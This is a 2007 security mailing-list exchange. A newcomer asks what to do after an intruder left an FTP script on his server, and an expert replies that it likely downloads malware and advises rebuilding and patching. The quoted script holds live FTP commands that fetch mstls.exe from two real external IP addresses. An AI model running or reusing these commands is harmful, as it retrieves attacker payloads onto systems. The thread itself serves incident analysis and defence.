RE: what next

["Roger A. Grimes" <roger () banneretcs com>]

Yes, it is an FTP script.  It's probably used by the attacker or malware
to download a malicious program or kit from a remote location. Very
common. My suggestion is to clean or rebuild you involved
computers/network. Patch or fix the problem that allowed the unknown
gentleman to do unauthorized behavior, and get on with normal life.
You'll spend too much time trying to investigate this sort of stuff, and
in the end, unless you get lucky enough to find all the malicious files
and disassemble them, you really won't know the intruder's intent or
objective.

Just my one half cent.

Roger 

-----Original Message-----
From: listbounce () securityfocus com [mailto:listbounce () securityfocus com]
On Behalf Of nemanja.janic () centroproizvod co yu
Sent: Tuesday, February 06, 2007 6:38 AM
To: security-basics () securityfocus com
Subject: what next

Hello list,
i wasn't sure where to post this, and since i'm just starting out in
security, i figured that this is the place.
Here goes:
i've had a fine unknown gentleman enter at his will to my server; among
other things he left behind a file named tt (no extension) which
contained the following lines:

open 80.93.223.22 14547
user 1 1
get mstls.exe
quit
open 80.71.219.134 5191
user 1 1
get mstls.exe
quit

I figure this is some script to be used with ftp, or at least i think
so. 
I did tracert to those adresses, but that's where i'm stuck. What can i
do next? 
And any idea what that mstls.exe is? I deleted it, but it was 0 bytes in
size. 
Thanx in advance.